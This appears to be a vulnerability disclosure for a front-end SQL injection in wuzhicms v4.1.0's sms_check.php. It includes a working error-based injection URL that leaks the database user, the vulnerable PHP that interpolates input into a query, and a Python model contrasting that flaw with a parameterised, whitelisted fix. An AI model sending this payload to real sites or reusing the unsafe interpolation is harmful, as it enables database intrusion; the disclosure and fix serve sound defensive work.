The $code parameter is taken directly into the execution of the get_one function without any filtering. The get_one function also detects the incoming SQL filtering, resulting in SQL injection.
The official website has been reproduced successfully.
love71 changed the title from "Wuzhi CMS v4.1.0 has SQL injection in the front end" (五指CMS v4.1.0前台存在SQL注入) to "wuzhicms v4.1.0 has a SQLi in the front end" on May 28, 2018
POC:
/api/sms_check.php?param=1%27and extractvalue(1,concat(0x7e,user()))%23
Vulnerability file: /api/sms_check.php
```php
define('WWW_ROOT', substr(dirname(__FILE__), 0, -4).'/');
require '../configs/web_config.php';
require COREframe_ROOT.'core.php';
if(!isset($GLOBALS['param'])) {
    exit('{"info":"验证失败","status":"n"}');
} elseif($GLOBALS['param']=='') {
    exit('{"info":"验证失败","status":"n"}');
}
// strip_tags() only removes HTML markup; quotes and SQL keywords pass through untouched
$code = strip_tags($GLOBALS['param']);
$posttime = SYS_TIME-300; // valid for 5 minutes
$db = load_class('db');
// $code is interpolated straight into the WHERE clause handed to get_one()
$r = $db->get_one('sms_checkcode', "code='$code' AND posttime>$posttime", '*', 0, 'id DESC');
if($r) {
    exit('{"info":"验证通过","status":"y"}');
} else {
    exit('{"info":"验证失败","status":"n"}');
}
```
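To show the defect and its fix side by side, here is an added Python model of the check above (not wuzhicms code): `vulnerable_where()` rebuilds the WHERE string the way sms_check.php does, so the page's PoC value survives `strip_tags()` and lands inside the SQL, while `check_code()` first whitelists the code's format (assumed here to be 4 to 8 digits) and then binds it as a query parameter against a constructed in-memory table.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed stand-in for the PoC on this page, URL-decoded:
# /api/sms_check.php?param=1%27and extractvalue(1,concat(0x7e,user()))%23
POC_PARAM = unquote("1%27and extractvalue(1,concat(0x7e,user()))%23")

# Assumption: a legitimate SMS verification code is 4 to 8 decimal digits.
CODE_RE = re.compile(r"^[0-9]{4,8}$")

def strip_tags(value: str) -> str:
    """Rough model of PHP strip_tags(): drops <...> markup only, keeps quotes."""
    return re.sub(r"<[^>]*>", "", value)

def vulnerable_where(param: str, posttime: int) -> str:
    """The WHERE clause sms_check.php builds: input is interpolated verbatim."""
    code = strip_tags(param)
    return f"code='{code}' AND posttime>{posttime}"

def validate_code(param: str):
    """Hardened input handling: return the code only if well-formed, else None."""
    code = strip_tags(param)
    return code if CODE_RE.match(code) else None

def check_code(conn: sqlite3.Connection, param: str, now: int) -> bool:
    """Hardened lookup: whitelist the code, then bind it as a query parameter."""
    code = validate_code(param)
    if code is None:
        return False
    row = conn.execute(
        "SELECT id FROM sms_checkcode WHERE code=? AND posttime>? "
        "ORDER BY id DESC LIMIT 1",
        (code, now - 300),  # 5-minute validity window, as in the original
    ).fetchone()
    return row is not None

def demo_db(now: int) -> sqlite3.Connection:
    """Constructed in-memory table with one fresh and one expired code."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sms_checkcode "
                 "(id INTEGER PRIMARY KEY, code TEXT, posttime INTEGER)")
    conn.executemany("INSERT INTO sms_checkcode (code, posttime) VALUES (?, ?)",
                     [("123456", now - 60), ("654321", now - 600)])
    return conn
```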